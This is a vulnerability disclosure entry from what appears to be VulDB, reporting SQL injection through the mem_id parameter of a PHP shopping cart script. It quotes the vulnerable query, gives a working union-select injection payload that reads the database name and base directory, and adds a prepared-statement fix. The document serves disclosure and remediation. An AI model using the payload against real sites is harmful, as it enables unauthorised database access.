| Title | The simple and beautiful PHP shopping cart system has a SQL injection vulnerability. |
|---|
| Description | The simple and beautiful PHP shopping cart system has a SQL injection vulnerability.
Vulnerability file location: /mkshop/Men/profile.php
Look at this source code:
```
$id = $_GET['mem_id'];
password='$password' WHERE mem_id = '$id' ")or die(mysqli_error());
```
The $id is not protected here. Malicious data can be constructed here to attack the website database.
The construction statement is as follows:
```
?mem_id=0' union select 1,database(),3,@@basedir,5,6,7,8--+
```
https://s1.ax1x.com/2022/08/14/vUSruD.png
Source link
https://www.sourcecodester.com/php/12579/simple-and-nice-shopping-cart-script.html |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/12579/simple-and-nice-shopping-cart-script.html |
|---|
| User | qidian (UID 30810) |
|---|
| Submission | 08/22/2022 14:12 (4 years ago) |
|---|
| Moderation | 08/23/2022 10:38 (20 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 207001 [SourceCodester Simple and Nice Shopping Cart Script /mkshop/Men/profile.php mem_id sql injection] |
|---|
| Points | 20 |
|---|
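
One way to close the injection in the `mem_id` handling reported above, as an added example that is not the project's or the submitter's code. The table name `members`, the connection settings and the `password` form field are assumptions; only `mem_id` and the `password` column appear in the report.

```php
<?php
// Added example, not the project's code. Hypothetical names: table `members`,
// the connection settings, and the POST field 'password'.
declare(strict_types=1);

// Raise exceptions on database errors instead of echoing them with die(),
// so SQL error text is not written into the response.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Accept only a positive decimal integer for mem_id.
 * Arrays, empty values and strings such as "0' union select ..." return null.
 */
function parse_member_id($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Update the password with a prepared statement. The values travel as bound
 * parameters, so they are never parsed as part of the SQL text.
 */
function update_password(mysqli $db, int $memId, string $password): int
{
    $stmt = $db->prepare('UPDATE members SET password = ? WHERE mem_id = ?');
    $stmt->bind_param('si', $password, $memId);
    $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected;
}

$memId = parse_member_id($_GET['mem_id'] ?? null);
if ($memId === null) {
    http_response_code(400);
    exit('Invalid member id');
}

$db = new mysqli('localhost', 'shop_user', 'change-me', 'shop'); // hypothetical settings
$db->set_charset('utf8mb4');
update_password($db, $memId, (string)($_POST['password'] ?? ''));
```

The integer check alone would stop the reported payload, but the bound parameters are what remove the injection point; the check keeps malformed ids from reaching the database at all.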